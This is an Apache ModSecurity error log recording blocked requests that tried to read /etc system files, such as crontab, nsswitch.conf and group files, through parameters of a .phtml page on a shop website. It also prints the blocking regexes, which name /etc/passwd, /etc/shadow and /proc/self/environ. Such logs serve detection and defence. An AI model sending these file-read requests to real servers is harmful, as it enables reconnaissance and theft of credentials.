[Thu Mar 19 14:38:31.542839 2026] [:error] [pid 17653:tid 140411548894976] [client 57.141.18.7:47084] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0l8df6f5d65gmYZSWsgAAAtc"]
[Thu Mar 19 14:38:32.071362 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.117:47090] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mOoXxyEfFpUF8f8ozwAAAUo"]
[Thu Mar 19 14:38:32.383873 2026] [:error] [pid 17653:tid 140411649607424] [client 57.141.18.21:47100] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mMdf6f5d65gmYZSWswAAAss"]
[Thu Mar 19 14:38:32.732626 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.67:47110] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mP-YZRR_7pZ7nDKnrQAAA8A"]
[Thu Mar 19 14:38:32.992808 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.74:47114] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mBCii7xarUs8iHYFqgAAAhA"]
[Thu Mar 19 14:38:33.611905 2026] [:error] [pid 27293:tid 140411691570944] [client 57.141.18.42:47130] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mf-YZRR_7pZ7nDKnrgAAA8Y"]
[Thu Mar 19 14:38:33.893443 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.54:47136] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mf-YZRR_7pZ7nDKnsAAAA8c"]
[Thu Mar 19 14:38:34.079788 2026] [:error] [pid 27293:tid 140411658000128] [client 57.141.18.58:47144] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mv-YZRR_7pZ7nDKnsgAAA8o"]
[Thu Mar 19 14:38:34.365657 2026] [:error] [pid 27293:tid 140411725141760] [client 57.141.18.63:47156] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mv-YZRR_7pZ7nDKnswAAA8I"]
[Thu Mar 19 14:38:34.635924 2026] [:error] [pid 30077:tid 140411540502272] [client 57.141.18.97:47158] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mvu8EFLIOrSqIpvE5wAAAlg"]
[Thu Mar 19 14:38:34.905069 2026] [:error] [pid 27293:tid 140411632822016] [client 57.141.18.24:47166] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0mv-YZRR_7pZ7nDKntAAAA80"]
[Thu Mar 19 14:38:35.351057 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.75:47176] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0m9a6ubjKNq_cu4Zy-wAAA0g"]
[Thu Mar 19 14:38:35.542117 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.1:47184] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0m_-YZRR_7pZ7nDKntgAAA9U"]
[Thu Mar 19 14:38:36.083731 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.77:47194] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nP-YZRR_7pZ7nDKntwAAA8A"]
[Thu Mar 19 14:38:36.470956 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.64:47198] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nPqxLDW4GITHUkSE6AAAAQg"]
[Thu Mar 19 14:38:36.566157 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.74:47202] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nPqxLDW4GITHUkSE6QAAARA"]
[Thu Mar 19 14:38:36.808358 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.96:47206] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nPu8EFLIOrSqIpvE6AAAAkY"]
[Thu Mar 19 14:38:37.243834 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.109:47214] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nb-FhjpZGs9ba8qHDwAAAwU"]
[Thu Mar 19 14:38:38.718749 2026] [:error] [pid 30077:tid 140411649607424] [client 57.141.18.37:47232] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nvu8EFLIOrSqIpvE6QAAAks"]
[Thu Mar 19 14:38:38.740235 2026] [:error] [pid 8307:tid 140411540502272] [client 57.141.18.96:47230] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nb-FhjpZGs9ba8qHEgAAAxg"]
[Thu Mar 19 14:38:38.742641 2026] [:error] [pid 8307:tid 140411641214720] [client 57.141.18.32:47224] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nb-FhjpZGs9ba8qHEAAAAww"]
[Thu Mar 19 14:38:38.902670 2026] [:error] [pid 8307:tid 140411565680384] [client 57.141.18.91:47248] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0nr-FhjpZGs9ba8qHEwAAAxU"]
[Thu Mar 19 14:38:39.227189 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.27:47258] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0n8df6f5d65gmYZSWtgAAAtU"]
[Thu Mar 19 14:38:39.351737 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.35:47218] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0n-oXxyEfFpUF8f8o0gAAAU8"]
[Thu Mar 19 14:38:39.698101 2026] [:error] [pid 17653:tid 140411607643904] [client 57.141.18.60:47270] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0n8df6f5d65gmYZSWtwAAAtA"]
[Thu Mar 19 14:38:40.053101 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.30:47282] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0oBCii7xarUs8iHYFsAAAAg8"]
[Thu Mar 19 14:38:40.528314 2026] [:error] [pid 7545:tid 140411649607424] [client 57.141.18.119:47292] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0oH8B84UptSoTJtYrXQAAAYs"]
[Thu Mar 19 14:38:41.095816 2026] [:error] [pid 7545:tid 140411582465792] [client 57.141.18.22:47304] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0oX8B84UptSoTJtYrXwAAAZM"]
[Thu Mar 19 14:38:41.120238 2026] [:error] [pid 17887:tid 140411607643904] [client 57.141.18.61:47306] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0oQkwaGbbGflqUZDl1wAAANA"]
